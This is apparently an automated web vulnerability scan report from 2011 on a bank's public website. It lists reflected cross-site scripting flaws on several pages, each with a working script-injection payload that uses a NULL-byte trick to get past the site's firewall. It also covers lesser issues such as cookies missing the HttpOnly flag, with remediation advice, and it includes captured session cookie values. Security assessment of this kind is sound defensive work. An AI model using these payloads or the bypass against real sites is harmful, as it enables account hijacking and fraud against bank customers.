Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/mobile/mobile-product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:30 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30271 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
2.7. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/checkcard/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 31030 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
2.8. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/onlinebanking/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 35938 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
2.9. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:59 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 32253 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
2.10. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 207 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
2.11. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao-matrix/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:34 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 218 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
2.12. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/oao/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 211 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
2.13. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.bbt.com
Path:
/images/chat/vcsp/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 212 cache-control: private x-powered-by: ASP.NET Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ebusapps/oaoctx/index.do HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-language: en-US content-type: text/html;charset=ISO-8859-1 date: Thu, 03 Feb 2011 13:48:08 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15471 cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: AMWEBJCT!%2Febusapps!JSESSIONID=0000H8qKkcBSqp8lSo5vj1iQigR:15f2vjsih; Path=/; secure Set-Cookie: PD_STATEFUL_8c2192d0-54f9-11db-adb9-00f84800e002=%2Febusapps; Path=/; secure Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ebusapps/oaoctx/index.do?prodtype=Savings&prodcd=144 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-language: en-US content-type: text/html;charset=ISO-8859-1 date: Thu, 03 Feb 2011 13:48:08 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15471 cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: AMWEBJCT!%2Febusapps!JSESSIONID=00006FL3ZwQjntLJabAPkPikczr:15f2vjsih; Path=/; secure Set-Cookie: PD_STATEFUL_bf09c460-54f9-11db-adb9-00f84800e002=%2Febusapps; Path=/; secure Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/query.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html; charset=iso-8859-1 date: Thu, 03 Feb 2011 14:11:47 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 7989 cache-control: public expires: Thu, 10 Feb 2011 14:11:47 GMT Set-Cookie: PD_STATEFUL_14655302-915f-11da-83e0-00f81800e002=%2Fsearch; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head> <title>Results for ''</title> <meta http-equiv="content-type" content="text/html; ...[SNIP]...
4. Cross-domain POSTpreviousnext There are 3 instances of this issue:
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /bbt/customerservice/default.html?WT.svl=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:38 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 26090 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
HTTP/1.1 403 content-type: text/html date: Thu, 03 Feb 2011 14:07:25 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15205 cache-control: private x-powered-by: ASP.NET Content-Length: 15345
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
<meta h ...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/Business/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:38 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 53187 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
GET /bbt/Financial-Education/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 27610 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
